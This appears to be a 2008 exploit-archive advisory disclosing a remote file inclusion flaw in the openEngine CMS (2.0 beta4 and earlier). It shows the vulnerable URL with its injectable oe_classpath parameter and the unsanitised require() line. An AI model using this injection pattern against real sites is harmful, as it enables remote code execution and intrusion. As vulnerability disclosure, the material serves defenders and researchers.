id: 3758
date: 09/24/2008
title: openEngine <= 2.0 beta4 Remote File Inclusion Vulnerability
author: dun
cves: 

===========================================================
openEngine <= 2.0 beta4 Remote File Inclusion Vulnerability
===========================================================



  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun ]

 ########################################################################
 #  [ openEngine <= 2.0 beta4 ]   Remote File Inclusion Vulnerability   #
 ########################################################################
 #
 # Script: "Open Source Web Content Management Systems openEngine"
 #
 # Script site: http://www.openengine.de/
 # Download:  http://sourceforge.net/projects/openengine/
 #
 # Vuln: http://site.com/[openengine20]/cms/system/openengine.php?oe_classpath=[spread???]
 #      
 #
 # Bug: ./openengine20/cms/system/openengine.php
 #
 # ...
 # 	require($oe_classpath."/openengine/database/mysql.php");
 # ... 	 
 #
 #
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************



#  0day.today [2023-03-23]  #